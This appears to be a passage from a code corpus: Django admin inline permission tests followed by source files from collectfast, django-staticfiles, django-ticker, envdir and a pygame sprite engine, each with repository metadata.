response = self.client.get(self.change_url)
inner_formset = response.context[-1]['inline_admin_formsets'][0].formset
expected = InnerInline.can_delete
actual = inner_formset.can_delete
self.assertEqual(expected, actual, 'can_delete must be equal')
def test_readonly_stacked_inline_label(self):
"""Bug #13174."""
holder = Holder.objects.create(dummy=42)
inner = Inner.objects.create(holder=holder, dummy=42, readonly='')
response = self.client.get('/admin/admin_inlines/holder/%i/'
% holder.id)
self.assertContains(response, '<label>Inner readonly label:</label>')
def test_many_to_many_inlines(self):
"Autogenerated many-to-many inlines are displayed correctly (#13407)"
response = self.client.get('/admin/admin_inlines/author/add/')
# The heading for the m2m inline block uses the right text
self.assertContains(response, '<h2>Author-book relationships</h2>')
# The "add another" label is correct
self.assertContains(response, 'Add another Author-Book Relationship')
# The '+' is dropped from the autogenerated form prefix (Author_books+)
self.assertContains(response, 'id="id_Author_books-TOTAL_FORMS"')
def test_inline_primary(self):
person = Person.objects.create(firstname='Imelda')
item = OutfitItem.objects.create(name='Shoes')
        # Imelda likes shoes, but can't carry her own bags.
data = {
'shoppingweakness_set-TOTAL_FORMS': 1,
'shoppingweakness_set-INITIAL_FORMS': 0,
'shoppingweakness_set-MAX_NUM_FORMS': 0,
'_save': u'Save',
'person': person.id,
'max_weight': 0,
'shoppingweakness_set-0-item': item.id,
}
response = self.client.post('/admin/admin_inlines/fashionista/add/', data)
self.assertEqual(response.status_code, 302)
self.assertEqual(len(Fashionista.objects.filter(person__firstname='Imelda')), 1)
def test_tabular_non_field_errors(self):
"""
Ensure that non_field_errors are displayed correctly, including the
right value for colspan. Refs #13510.
"""
data = {
'title_set-TOTAL_FORMS': 1,
'title_set-INITIAL_FORMS': 0,
'title_set-MAX_NUM_FORMS': 0,
'_save': u'Save',
'title_set-0-title1': 'a title',
'title_set-0-title2': 'a different title',
}
response = self.client.post('/admin/admin_inlines/titlecollection/add/', data)
        # Here colspan is "4": two fields (title1 and title2), one hidden field and the delete checkbox.
self.assertContains(response, '<tr><td colspan="4"><ul class="errorlist"><li>The two titles must be the same</li></ul></td></tr>')
def test_no_parent_callable_lookup(self):
"""Admin inline `readonly_field` shouldn't invoke parent ModelAdmin callable"""
# Identically named callable isn't present in the parent ModelAdmin,
# rendering of the add view shouldn't explode
response = self.client.get('/admin/admin_inlines/novel/add/')
self.assertEqual(response.status_code, 200)
# View should have the child inlines section
self.assertContains(response, '<div class="inline-group" id="chapter_set-group">')
def test_callable_lookup(self):
"""Admin inline should invoke local callable when its name is listed in readonly_fields"""
response = self.client.get('/admin/admin_inlines/poll/add/')
self.assertEqual(response.status_code, 200)
# Add parent object view should have the child inlines section
self.assertContains(response, '<div class="inline-group" id="question_set-group">')
        # The right callable should be used for the inline readonly_fields
        # column cells
self.assertContains(response, '<p>Callable in QuestionInline</p>')
def test_help_text(self):
"""
Ensure that the inlines' model field help texts are displayed when
using both the stacked and tabular layouts.
Ref #8190.
"""
response = self.client.get('/admin/admin_inlines/holder4/add/')
self.assertContains(response, '<p class="help">Awesome stacked help text is awesome.</p>', 4)
self.assertContains(response, '<img src="/static/admin/img/icon-unknown.gif" class="help help-tooltip" width="10" height="10" alt="(Awesome tabular help text is awesome.)" title="Awesome tabular help text is awesome." />', 1)
def test_non_related_name_inline(self):
"""
Ensure that multiple inlines with related_name='+' have correct form
prefixes. Bug #16838.
"""
response = self.client.get('/admin/admin_inlines/capofamiglia/add/')
self.assertContains(response,
'<input type="hidden" name="-1-0-id" id="id_-1-0-id" />')
self.assertContains(response,
'<input type="hidden" name="-1-0-capo_famiglia" '
'id="id_-1-0-capo_famiglia" />')
self.assertContains(response,
'<input id="id_-1-0-name" type="text" class="vTextField" '
'name="-1-0-name" maxlength="100" />')
self.assertContains(response,
'<input type="hidden" name="-2-0-id" id="id_-2-0-id" />')
self.assertContains(response,
'<input type="hidden" name="-2-0-capo_famiglia" '
'id="id_-2-0-capo_famiglia" />')
self.assertContains(response,
'<input id="id_-2-0-name" type="text" class="vTextField" '
'name="-2-0-name" maxlength="100" />')
class TestInlineMedia(TestCase):
urls = "regressiontests.admin_inlines.urls"
fixtures = ['admin-views-users.xml']
def setUp(self):
result = self.client.login(username='super', password='<PASSWORD>')
self.assertEqual(result, True)
def tearDown(self):
self.client.logout()
def test_inline_media_only_base(self):
holder = Holder(dummy=13)
holder.save()
Inner(dummy=42, holder=holder).save()
change_url = '/admin/admin_inlines/holder/%i/' % holder.id
response = self.client.get(change_url)
self.assertContains(response, 'my_awesome_admin_scripts.js')
def test_inline_media_only_inline(self):
holder = Holder3(dummy=13)
holder.save()
Inner3(dummy=42, holder=holder).save()
change_url = '/admin/admin_inlines/holder3/%i/' % holder.id
response = self.client.get(change_url)
self.assertContains(response, 'my_awesome_inline_scripts.js')
def test_all_inline_media(self):
holder = Holder2(dummy=13)
holder.save()
Inner2(dummy=42, holder=holder).save()
change_url = '/admin/admin_inlines/holder2/%i/' % holder.id
response = self.client.get(change_url)
self.assertContains(response, 'my_awesome_admin_scripts.js')
self.assertContains(response, 'my_awesome_inline_scripts.js')
class TestInlineAdminForm(TestCase):
urls = "regressiontests.admin_inlines.urls"
def test_immutable_content_type(self):
"""Regression for #9362
The problem depends only on InlineAdminForm and its "original"
argument, so we can safely set the other arguments to None/{}. We just
need to check that the content_type argument of Child isn't altered by
the internals of the inline form."""
sally = Teacher.objects.create(name='Sally')
john = Parent.objects.create(name='John')
joe = Child.objects.create(name='Joe', teacher=sally, parent=john)
iaf = InlineAdminForm(None, None, {}, {}, joe)
parent_ct = ContentType.objects.get_for_model(Parent)
self.assertEqual(iaf.original.content_type, parent_ct)
class TestInlinePermissions(TestCase):
"""
Make sure the admin respects permissions for objects that are edited
inline. Refs #8060.
"""
urls = "regressiontests.admin_inlines.urls"
def setUp(self):
self.user = User(username='admin')
self.user.is_staff = True
self.user.is_active = True
self.user.set_password('<PASSWORD>')
self.user.save()
self.author_ct = ContentType.objects.get_for_model(Author)
self.holder_ct = ContentType.objects.get_for_model(Holder2)
self.book_ct = ContentType.objects.get_for_model(Book)
self.inner_ct = ContentType.objects.get_for_model(Inner2)
# User always has permissions to add and change Authors, and Holders,
# the main (parent) models of the inlines. Permissions on the inlines
# vary per test.
permission = Permission.objects.get(codename='add_author', content_type=self.author_ct)
self.user.user_permissions.add(permission)
permission = Permission.objects.get(codename='change_author', content_type=self.author_ct)
self.user.user_permissions.add(permission)
permission = Permission.objects.get(codename='add_holder2', content_type=self.holder_ct)
self.user.user_permissions.add(permission)
permission = Permission.objects.get(codename='change_holder2', content_type=self.holder_ct)
self.user.user_permissions.add(permission)
author = Author.objects.create(pk=1, name=u'The Author')
book = author.books.create(name=u'The inline Book')
self.author_change_url = '/admin/admin_inlines/author/%i/' % author.id
# Get the ID of the automatically created intermediate model for the Author-Book m2m
author_book_auto_m2m_intermediate = Author.books.through.objects.get(author=author, book=book)
self.author_book_auto_m2m_intermediate_id = author_book_auto_m2m_intermediate.pk
holder = Holder2.objects.create(dummy=13)
inner2 = Inner2.objects.create(dummy=42, holder=holder)
self.holder_change_url = '/admin/admin_inlines/holder2/%i/' % holder.id
self.inner2_id = inner2.id
self.assertEqual(
self.client.login(username='admin', password='<PASSWORD>'),
True)
def tearDown(self):
self.client.logout()
def test_inline_add_m2m_noperm(self):
response = self.client.get('/admin/admin_inlines/author/add/')
# No change permission on books, so no inline
self.assertNotContains(response, '<h2>Author-book relationships</h2>')
self.assertNotContains(response, 'Add another Author-Book Relationship')
self.assertNotContains(response, 'id="id_Author_books-TOTAL_FORMS"')
def test_inline_add_fk_noperm(self):
response = self.client.get('/admin/admin_inlines/holder2/add/')
# No permissions on Inner2s, so no inline
self.assertNotContains(response, '<h2>Inner2s</h2>')
self.assertNotContains(response, 'Add another Inner2')
self.assertNotContains(response, 'id="id_inner2_set-TOTAL_FORMS"')
def test_inline_change_m2m_noperm(self):
response = self.client.get(self.author_change_url)
# No change permission on books, so no inline
self.assertNotContains(response, '<h2>Author-book relationships</h2>')
self.assertNotContains(response, 'Add another Author-Book Relationship')
self.assertNotContains(response, 'id="id_Author_books-TOTAL_FORMS"')
def test_inline_change_fk_noperm(self):
response = self.client.get(self.holder_change_url)
# No permissions on Inner2s, so no inline
self.assertNotContains(response, '<h2>Inner2s</h2>')
self.assertNotContains(response, 'Add another Inner2')
self.assertNotContains(response, 'id="id_inner2_set-TOTAL_FORMS"')
def test_inline_add_m2m_add_perm(self):
permission = Permission.objects.get(codename='add_book', content_type=self.book_ct)
self.user.user_permissions.add(permission)
response = self.client.get('/admin/admin_inlines/author/add/')
# No change permission on Books, so no inline
self.assertNotContains(response, '<h2>Author-book relationships</h2>')
self.assertNotContains(response, 'Add another Author-Book Relationship')
self.assertNotContains(response, 'id="id_Author_books-TOTAL_FORMS"')
def test_inline_add_fk_add_perm(self):
permission = Permission.objects.get(codename='add_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
response = self.client.get('/admin/admin_inlines/holder2/add/')
# Add permission on inner2s, so we get the inline
self.assertContains(response, '<h2>Inner2s</h2>')
self.assertContains(response, 'Add another Inner2')
self.assertContains(response, 'value="3" id="id_inner2_set-TOTAL_FORMS"')
def test_inline_change_m2m_add_perm(self):
permission = Permission.objects.get(codename='add_book', content_type=self.book_ct)
self.user.user_permissions.add(permission)
response = self.client.get(self.author_change_url)
# No change permission on books, so no inline
self.assertNotContains(response, '<h2>Author-book relationships</h2>')
self.assertNotContains(response, 'Add another Author-Book Relationship')
self.assertNotContains(response, 'id="id_Author_books-TOTAL_FORMS"')
self.assertNotContains(response, 'id="id_Author_books-0-DELETE"')
def test_inline_change_m2m_change_perm(self):
permission = Permission.objects.get(codename='change_book', content_type=self.book_ct)
self.user.user_permissions.add(permission)
response = self.client.get(self.author_change_url)
# We have change perm on books, so we can add/change/delete inlines
self.assertContains(response, '<h2>Author-book relationships</h2>')
self.assertContains(response, 'Add another Author-Book Relationship')
self.assertContains(response, 'value="4" id="id_Author_books-TOTAL_FORMS"')
self.assertContains(response, '<input type="hidden" name="Author_books-0-id" value="%i"' % self.author_book_auto_m2m_intermediate_id)
self.assertContains(response, 'id="id_Author_books-0-DELETE"')
def test_inline_change_fk_add_perm(self):
permission = Permission.objects.get(codename='add_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
response = self.client.get(self.holder_change_url)
# Add permission on inner2s, so we can add but not modify existing
self.assertContains(response, '<h2>Inner2s</h2>')
self.assertContains(response, 'Add another Inner2')
# 3 extra forms only, not the existing instance form
self.assertContains(response, 'value="3" id="id_inner2_set-TOTAL_FORMS"')
self.assertNotContains(response, '<input type="hidden" name="inner2_set-0-id" value="%i"' % self.inner2_id)
def test_inline_change_fk_change_perm(self):
permission = Permission.objects.get(codename='change_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
response = self.client.get(self.holder_change_url)
# Change permission on inner2s, so we can change existing but not add new
self.assertContains(response, '<h2>Inner2s</h2>')
# Just the one form for existing instances
self.assertContains(response, 'value="1" id="id_inner2_set-TOTAL_FORMS"')
self.assertContains(response, '<input type="hidden" name="inner2_set-0-id" value="%i"' % self.inner2_id)
# max-num 0 means we can't add new ones
self.assertContains(response, 'value="0" id="id_inner2_set-MAX_NUM_FORMS"')
def test_inline_change_fk_add_change_perm(self):
permission = Permission.objects.get(codename='add_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
permission = Permission.objects.get(codename='change_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
response = self.client.get(self.holder_change_url)
# Add/change perm, so we can add new and change existing
self.assertContains(response, '<h2>Inner2s</h2>')
# One form for existing instance and three extra for new
self.assertContains(response, 'value="4" id="id_inner2_set-TOTAL_FORMS"')
self.assertContains(response, '<input type="hidden" name="inner2_set-0-id" value="%i"' % self.inner2_id)
def test_inline_change_fk_change_del_perm(self):
permission = Permission.objects.get(codename='change_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
permission = Permission.objects.get(codename='delete_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
response = self.client.get(self.holder_change_url)
# Change/delete perm on inner2s, so we can change/delete existing
self.assertContains(response, '<h2>Inner2s</h2>')
# One form for existing instance only, no new
self.assertContains(response, 'value="1" id="id_inner2_set-TOTAL_FORMS"')
self.assertContains(response, '<input type="hidden" name="inner2_set-0-id" value="%i"' % self.inner2_id)
self.assertContains(response, 'id="id_inner2_set-0-DELETE"')
def test_inline_change_fk_all_perms(self):
permission = Permission.objects.get(codename='add_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
permission = Permission.objects.get(codename='change_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
permission = Permission.objects.get(codename='delete_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
response = self.client.get(self.holder_change_url)
# All perms on inner2s, so we can add/change/delete
self.assertContains(response, '<h2>Inner2s</h2>')
# One form for existing instance only, three for new
self.assertContains(response, 'value="4" id="id_inner2_set-TOTAL_FORMS"')
self.assertContains(response, '<input type="hidden" name="inner2_set-0-id" value="%i"' % self.inner2_id)
self.assertContains(response, 'id="id_inner2_set-0-DELETE"')
```
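For context, a hedged sketch of the kind of inline registration the permission tests above exercise. This is not the actual test app's admin module; the model names are taken from the tests, but options such as `extra` are assumptions chosen to match the `TOTAL_FORMS` assertions.

```python
# Hypothetical sketch, not the test suite's real admin.py.
from django.contrib import admin

from regressiontests.admin_inlines.models import Holder2, Inner2  # assumed import path


class Inner2Inline(admin.TabularInline):
    model = Inner2
    extra = 3  # three empty extra forms -> 'value="3" id="id_inner2_set-TOTAL_FORMS"'


class Holder2Admin(admin.ModelAdmin):
    inlines = [Inner2Inline]


admin.site.register(Holder2, Holder2Admin)
```

Django only renders the inline (and its add/delete controls) when the request user holds the matching add/change/delete permissions on the child model, which is what the assertions on `<h2>Inner2s</h2>` and the hidden form fields check.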
|
{
"source": "jezdez/collectfast",
"score": 2
}
|
#### File: collectfast/collectfast/settings.py
```python
from typing import Container
from typing import Type
from typing import TypeVar
from django.conf import settings
from typing_extensions import Final
T = TypeVar("T")
def _get_setting(type_: Type[T], key: str, default: T) -> T:
value = getattr(settings, key, default)
if not isinstance(value, type_):
raise ValueError(
f"The {key!r} setting must be of type {type_!r}, found {type(value)}"
)
return value
debug: Final = _get_setting(
bool, "COLLECTFAST_DEBUG", _get_setting(bool, "DEBUG", False)
)
cache_key_prefix: Final = _get_setting(
str, "COLLECTFAST_CACHE_KEY_PREFIX", "collectfast06_asset_"
)
cache: Final = _get_setting(str, "COLLECTFAST_CACHE", "default")
threads: Final = _get_setting(int, "COLLECTFAST_THREADS", 0)
enabled: Final = _get_setting(bool, "COLLECTFAST_ENABLED", True)
aws_is_gzipped: Final = _get_setting(bool, "AWS_IS_GZIPPED", False)
gzip_content_types: Final[Container] = _get_setting(
tuple,
"GZIP_CONTENT_TYPES",
(
"text/css",
"text/javascript",
"application/javascript",
"application/x-javascript",
"image/svg+xml",
),
)
```
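As a quick illustration of the `_get_setting` pattern above, here is a minimal sketch (the setting value is deliberately misconfigured): the helper reads a Django setting, falls back to the default when it is absent, and rejects values of the wrong type at import time.

```python
# Usage sketch of the type-checked settings lookup shown above.
from django.conf import settings

settings.configure(COLLECTFAST_THREADS="eight")  # wrong type on purpose


def get_setting(type_, key, default):
    value = getattr(settings, key, default)
    if not isinstance(value, type_):
        raise ValueError(
            f"The {key!r} setting must be of type {type_!r}, found {type(value)}"
        )
    return value


print(get_setting(bool, "COLLECTFAST_DEBUG", False))  # missing setting -> default
try:
    get_setting(int, "COLLECTFAST_THREADS", 0)
except ValueError as exc:
    print(exc)  # misconfigured value is rejected immediately
```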
#### File: tests/command/test_post_process.py
```python
from unittest import mock
from django.contrib.staticfiles.storage import StaticFilesStorage
from django.test import override_settings as override_django_settings
from collectfast.management.commands.collectstatic import Command
from collectfast.tests.utils import clean_static_dir
from collectfast.tests.utils import create_static_file
from collectfast.tests.utils import override_setting
class MockPostProcessing(StaticFilesStorage):
def __init__(self):
super().__init__()
self.post_process = mock.MagicMock()
@override_setting("threads", 2)
@override_django_settings(
STATICFILES_STORAGE="collectfast.tests.command.test_post_process.MockPostProcessing"
)
def test_calls_post_process_with_collected_files() -> None:
clean_static_dir()
path = create_static_file()
cmd = Command()
cmd.run_from_argv(["manage.py", "collectstatic", "--noinput"])
cmd.storage.post_process.assert_called_once_with(
{path.name: (mock.ANY, path.name)}, dry_run=False
)
```
#### File: collectfast/tests/utils.py
```python
import functools
import os
import pathlib
import random
import unittest
import uuid
from typing import Any
from typing import Callable
from typing import Type
from typing import TypeVar
from typing import cast
import pytest
from django.conf import settings as django_settings
from django.utils.module_loading import import_string
from typing_extensions import Final
from collectfast import settings
live_test = pytest.mark.skipif(
os.environ.get("SKIP_LIVE_TESTS") == "true", reason="not running live tests"
)
static_dir: Final = pathlib.Path(django_settings.STATICFILES_DIRS[0])
F = TypeVar("F", bound=Callable[..., Any])
def make_test(func: F) -> Type[unittest.TestCase]:
"""
Creates a class that inherits from `unittest.TestCase` with the decorated
function as a method. Create tests like this:
>>> fn = lambda x: 1337
>>> @make_test
... def test_fn(case):
... case.assertEqual(fn(), 1337)
"""
case = type(func.__name__, (unittest.TestCase,), {func.__name__: func})
case.__module__ = func.__module__
return case
def test_many(**mutations: Callable[[F], F]) -> Callable[[F], Type[unittest.TestCase]]:
def test(func: F) -> Type[unittest.TestCase]:
"""
Creates a class that inherits from `unittest.TestCase` with the decorated
function as a method. Create tests like this:
>>> fn = lambda x: 1337
>>> @make_test
... def test_fn(case):
... case.assertEqual(fn(), 1337)
"""
case_dict = {
"test_%s" % mutation_name: mutation(func)
for mutation_name, mutation in mutations.items()
}
case = type(func.__name__, (unittest.TestCase,), case_dict)
case.__module__ = func.__module__
return case
return test
def create_static_file() -> pathlib.Path:
"""Write random characters to a file in the static directory."""
path = static_dir / f"{uuid.uuid4().hex}.txt"
path.write_text("".join(chr(random.randint(0, 64)) for _ in range(500)))
return path
def clean_static_dir() -> None:
for filename in os.listdir(static_dir.as_posix()):
file = static_dir / filename
if file.is_file():
file.unlink()
def override_setting(name: str, value: Any) -> Callable[[F], F]:
def decorator(fn: F) -> F:
@functools.wraps(fn)
def wrapper(*args, **kwargs):
original = getattr(settings, name)
setattr(settings, name, value)
try:
return fn(*args, **kwargs)
finally:
setattr(settings, name, original)
return cast(F, wrapper)
return decorator
def override_storage_attr(name: str, value: Any) -> Callable[[F], F]:
def decorator(fn: F) -> F:
@functools.wraps(fn)
def wrapper(*args, **kwargs):
storage = import_string(django_settings.STATICFILES_STORAGE)
original = getattr(storage, name)
setattr(storage, name, value)
try:
return fn(*args, **kwargs)
finally:
setattr(storage, name, original)
return cast(F, wrapper)
return decorator
```
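The `override_setting` and `override_storage_attr` decorators above both follow the same temporary-override pattern: swap an attribute in, run the wrapped function, and restore the original in a `finally` block. A standalone sketch of that pattern (names here are generic, not from the library):

```python
# Generic sketch of the temporary-override decorator pattern used above.
import functools
import types

config = types.SimpleNamespace(threads=0)


def override_attr(obj, name, value):
    def decorator(fn):
        @functools.wraps(fn)
        def wrapper(*args, **kwargs):
            original = getattr(obj, name)
            setattr(obj, name, value)
            try:
                return fn(*args, **kwargs)
            finally:
                setattr(obj, name, original)  # always restored, even on error
        return wrapper
    return decorator


@override_attr(config, "threads", 2)
def report():
    return config.threads


print(report(), config.threads)  # 2 0 -> override only active inside the call
```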
|
{
"source": "jezdez/django-staticfiles",
"score": 3
}
|
#### File: django-staticfiles/staticfiles/utils.py
```python
import os
import fnmatch
import warnings
def get_files_for_app(app, ignore_patterns=None):
"""
Return a list containing the relative source paths for all files that
should be copied for an app.
"""
from staticfiles.storage import AppStaticStorage
if ignore_patterns is None:
ignore_patterns = []
warnings.warn(
"The staticfiles.utils.get_files_for_app utility function is "
"deprecated. Use staticfiles.storage.AppStaticStorage.get_files "
"instead.", DeprecationWarning)
return AppStaticStorage(app).get_files(ignore_patterns)
def get_app_prefix(app):
"""
Return the path name that should be prepended to files for this app.
"""
from staticfiles.storage import AppStaticStorage
warnings.warn(
"The staticfiles.utils.get_app_prefix utility function is "
"deprecated. Use staticfiles.storage.AppStaticStorage.get_prefix "
"instead.", DeprecationWarning)
return AppStaticStorage(app).get_prefix()
def matches_patterns(path, patterns=None):
"""
Return True or False depending on whether the ``path`` should be
ignored (if it matches any pattern in ``ignore_patterns``).
"""
if patterns is None:
patterns = []
for pattern in patterns:
if fnmatch.fnmatchcase(path, pattern):
return True
return False
def get_filtered_patterns(storage, ignore_patterns=None, location=''):
"""
Return a filtered list of patterns that match the storage location.
"""
if ignore_patterns is None:
ignore_patterns = []
storage_prefix = getattr(storage, 'prefix', None) or ''
if location:
rel_location = os.path.join(storage_prefix, location)
abs_location = os.path.join(storage.location, location)
else:
rel_location = storage_prefix
abs_location = storage.location
ignore_filtered = []
for pattern in ignore_patterns:
head, tail = os.path.split(pattern)
if not tail:
head, tail = os.path.split(head)
if head in ('', rel_location, abs_location):
ignore_filtered.append(tail)
return ignore_filtered
def get_files(storage, ignore_patterns=None, location=''):
"""
Recursively walk the storage directories yielding the paths
of all files that should be copied.
"""
if ignore_patterns is None:
ignore_patterns = []
ignore_filtered = get_filtered_patterns(storage, ignore_patterns, location)
directories, files = storage.listdir(location)
for fn in files:
if matches_patterns(fn, ignore_filtered):
continue
if location:
fn = os.path.join(location, fn)
yield fn
for dir in directories:
if matches_patterns(dir, ignore_filtered):
continue
if location:
dir = os.path.join(location, dir)
for fn in get_files(storage, ignore_patterns, dir):
yield fn
```
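A hypothetical usage sketch of the `get_files` generator above: it walks a storage recursively via `storage.listdir()` and yields paths relative to the storage location, filtering ignore patterns per directory. The directory path here is made up.

```python
# Hypothetical usage sketch of get_files() with a filesystem-backed storage.
from django.core.files.storage import FileSystemStorage

from staticfiles.utils import get_files

storage = FileSystemStorage(location="/tmp/static-example")  # made-up location
for relative_path in get_files(storage, ignore_patterns=["CVS", "*.tmp"]):
    print(relative_path)  # paths are relative to the storage location
```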
|
{
"source": "jezdez/django-ticker",
"score": 2
}
|
#### File: django-ticker/ticker/admin.py
```python
from django import forms
from django.db import models
from django.contrib import admin
from django.contrib.auth.models import User
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
from tagging.models import Tag
from ticker.models import Entry, EntryResource, EntryResourceType
from ticker.widgets import ForeignKeyAsTextWidget
class EntryMetadataInline(admin.StackedInline):
model = EntryResource
fieldsets = (
(None, {
'fields': (('type', 'title'), 'description', 'url')
}),
)
class EntryAdmin(admin.ModelAdmin):
inlines = [EntryMetadataInline]
list_display = (
'title',
'status',
'author',
)
fields = (
'author',
'status',
'title',
'content',
'content_more',
'tags',
'enable_comments',
)
def queryset(self, request):
"""
Show only entries whose author is the current user.
Show all entries if the user has the permission `can_change_foreign`.
"""
if request.user.has_perm('ticker.can_change_foreign'):
return self.model._default_manager.get_query_set()
return self.model._default_manager.get_query_set().filter(author=request.user)
def formfield_for_dbfield(self, db_field, **kwargs):
field = super(EntryAdmin, self).formfield_for_dbfield(db_field, **kwargs)
# authors who are not allowed to edit foreign articles won't see a
# dropdown
if db_field.name == "author":
if not self._request.user.has_perm('ticker.can_change_foreign'):
field.widget = ForeignKeyAsTextWidget(append_text=_('Your username gets saved automatically'))
field.initial = self._request.user.pk
return field
if db_field.name == "status":
# if the author does not have the "can_publish" permission, only offer
# the "closed" and "draft" choices
if not self._request.user.has_perm('ticker.can_publish'):
user_choices = ([i for i in Entry.STATUS_CHOICES \
if i[0] != Entry.STATUS_OPEN])
else:
user_choices = Entry.STATUS_CHOICES
# except the article was set to be "live", then show it
if hasattr(self, '_obj') and self._obj.status == Entry.STATUS_OPEN:
user_choices = Entry.STATUS_CHOICES
field = forms.ChoiceField(choices=user_choices)
return field
return field
# ``formfield_for_dbfield`` has no access to the request, therefore we
# stash the request on the admin instance in the view methods below.
def change_view(self, request, object_id, *args, **kwargs):
self._request = request
self._obj = Entry.objects.get(pk=object_id)
return super(EntryAdmin, self).change_view(request, object_id, *args, **kwargs)
def add_view(self, request, *args, **kwargs):
self._request = request
return super(EntryAdmin, self).add_view(request, *args, **kwargs)
def has_change_permission(self, request, obj=None):
if not super(EntryAdmin, self).has_change_permission(request, obj):
return False
if obj is not None and not request.user.has_perm('ticker.can_change_foreign') \
and request.user.pk != obj.author.pk:
return False
return True
admin.site.register(Entry, EntryAdmin)
admin.site.register(EntryResourceType)
```
|
{
"source": "jezdez/envdir",
"score": 2
}
|
#### File: envdir/envdir/runner.py
```python
import optparse
import os
import subprocess
import sys
from .env import Env
from .version import __version__
class Response(Exception):
def __init__(self, message="", status=0):
self.message = message
self.status = status
class Runner(object):
envdir_usage = "usage: %prog [--help] [--version] dir child"
envshell_usage = "usage: %prog [--help] [--version] dir"
def __init__(self):
self.parser = optparse.OptionParser(version=__version__)
self.parser.disable_interspersed_args()
self.parser.prog = "envdir"
def path(self, path):
real_path = os.path.realpath(os.path.expanduser(path))
if not os.path.exists(real_path):
# use 111 error code to adhere to envdir's standard
raise Response("envdir %r does not exist" % path, 111)
if not os.path.isdir(real_path):
# use 111 error code to adhere to envdir's standard
raise Response("envdir %r not a directory" % path, 111)
return real_path
def open(self, path=None, stacklevel=1):
if path is None:
frame = sys._getframe()
def get_parent(frame):
return frame.f_back
for _ in range(stacklevel):
frame = get_parent(frame)
if frame is not None:
callerdir = os.path.dirname(frame.f_code.co_filename)
path = os.path.join(callerdir, "envdir")
else:
# last holdout, assume cwd
path = "envdir"
return Env(self.path(path))
def shell(self, name, *args):
self.parser.set_usage(self.envshell_usage)
self.parser.prog = "envshell"
options, args = self.parser.parse_args(list(args))
if len(args) == 0:
raise Response(
"%s\nError: incorrect number of arguments\n"
% (self.parser.get_usage()),
2,
)
sys.stdout.write(
"Launching envshell for %s. "
"Type 'exit' or 'Ctrl+D' to return.\n" % self.path(args[0])
)
sys.stdout.flush()
self.open(args[0], 2)
if "SHELL" in os.environ:
shell = os.environ["SHELL"]
elif "COMSPEC" in os.environ:
shell = os.environ["COMSPEC"]
else:
raise Response("Unable to detect current environment shell")
try:
subprocess.call([shell])
except OSError as err:
if err.errno == 2:
raise Response("Unable to find shell %s" % shell, status=err.errno)
else:
raise Response("An error occurred: %s" % err, status=err.errno)
raise Response()
def run(self, name, *args):
self.parser.set_usage(self.envdir_usage)
self.parser.prog = "envdir"
options, args = self.parser.parse_args(list(args))
if len(args) < 2:
raise Response(
"%s\nError: incorrect number of arguments\n"
% (self.parser.get_usage()),
2,
)
self.open(args[0], 2)
# the args to call later
args = args[1:]
# in case someone passes in -- for any reason to separate the commands
if args[0] == "--":
args = args[1:]
try:
os.execvpe(args[0], args, os.environ)
except OSError as err:
raise Response(
"Unable to run command %s: %s" % (args[0], err), status=err.errno
)
raise Response()
def go(caller, *args):
if not args:
args = sys.argv
try:
caller(args[0], *args[1:])
except Response as response:
if response.message:
sys.stderr.write(response.message)
sys.exit(response.status or 0)
else:
sys.exit(0)
runner = Runner()
```
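How this module is wired into command-line entry points is not shown in the file above; the sketch below is an assumption about that wiring, based on the `go()` helper, which falls back to `sys.argv` and turns a `Response` into a stderr message plus exit status.

```python
# Assumed wiring sketch (not part of runner.py above).
from envdir.runner import go, runner


def main():
    # e.g. `envdir ./envdir env` runs `env` with the directory's variables;
    # go() uses sys.argv when called with no explicit arguments.
    go(runner.run)


def main_shell():
    go(runner.shell)


if __name__ == "__main__":
    main()
```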
|
{
"source": "jezdez/simonblinks",
"score": 3
}
|
#### File: simonblinks/simonblinks/gameEngine.py
```python
import pygame, math
pygame.init()
class BasicSprite(pygame.sprite.Sprite):
""" use this sprite when you want to
directly control the sprite with dx and dy
or want to extend in another direction than DirSprite
"""
def __init__(self, scene):
pygame.sprite.Sprite.__init__(self)
self.screen = scene.screen
self.image = pygame.Surface((25, 25))
self.image.fill((255, 0, 0))
self.rect = self.image.get_rect()
self.x = 100
self.y = 100
self.dx = 0
self.dy = 0
def update(self):
self.x += self.dx
self.y += self.dy
self.checkBounds()
self.rect.center = (self.x, self.y)
def checkBounds(self):
scrWidth = self.screen.get_width()
scrHeight = self.screen.get_height()
if self.x > scrWidth:
self.x = 0
if self.x < 0:
self.x = scrWidth
if self.y > scrHeight:
self.y = 0
if self.y < 0:
self.y = scrHeight
class SuperSprite(pygame.sprite.Sprite):
""" An enhanced Sprite class
expects a gameEngine.Scene class as its one parameter
Use methods to change image, direction, speed
Will automatically travel in direction and speed indicated
Automatically rotates to point in indicated direction
Five kinds of boundary collision
"""
def __init__(self, scene):
pygame.sprite.Sprite.__init__(self)
self.scene = scene
self.screen = scene.screen
#create constants
self.WRAP = 0
self.BOUNCE = 1
self.STOP = 2
self.HIDE = 3
self.CONTINUE = 4
#create a default text image as a placeholder
#This will usually be changed by a setImage call
self.font = pygame.font.Font("freesansbold.ttf", 30)
self.imageMaster = self.font.render("TUIO", True, (0, 0,0), (0xFF, 0xFF, 0xFF))
self.image = self.imageMaster
self.rect = self.image.get_rect()
#create properties
#most will be changed through method calls
self.x = 200
self.y = 200
self.dx = 0
self.dy = 0
self.dir = 0
self.rotation = 0
self.speed = 0
self.maxSpeed = 10
self.minSpeed = -3
self.boundAction = self.WRAP
self.pressed = False
self.oldCenter = (100, 100)
def update(self):
self.oldCenter = self.rect.center
self.checkEvents()
self.__rotate()
self.__calcVector()
self.__calcPosition()
self.checkBounds()
self.rect.center = (self.x, self.y)
def checkEvents(self):
""" overwrite this method to add your own event code """
pass
def __rotate(self):
""" PRIVATE METHOD
change visual orientation based on
rotation property.
automatically called in update.
change rotation property directly or with
rotateBy(), setAngle() methods
"""
oldCenter = self.rect.center
self.oldCenter = oldCenter
self.image = pygame.transform.rotate(self.imageMaster, self.rotation)
self.rect = self.image.get_rect()
self.rect.center = oldCenter
def __calcVector(self):
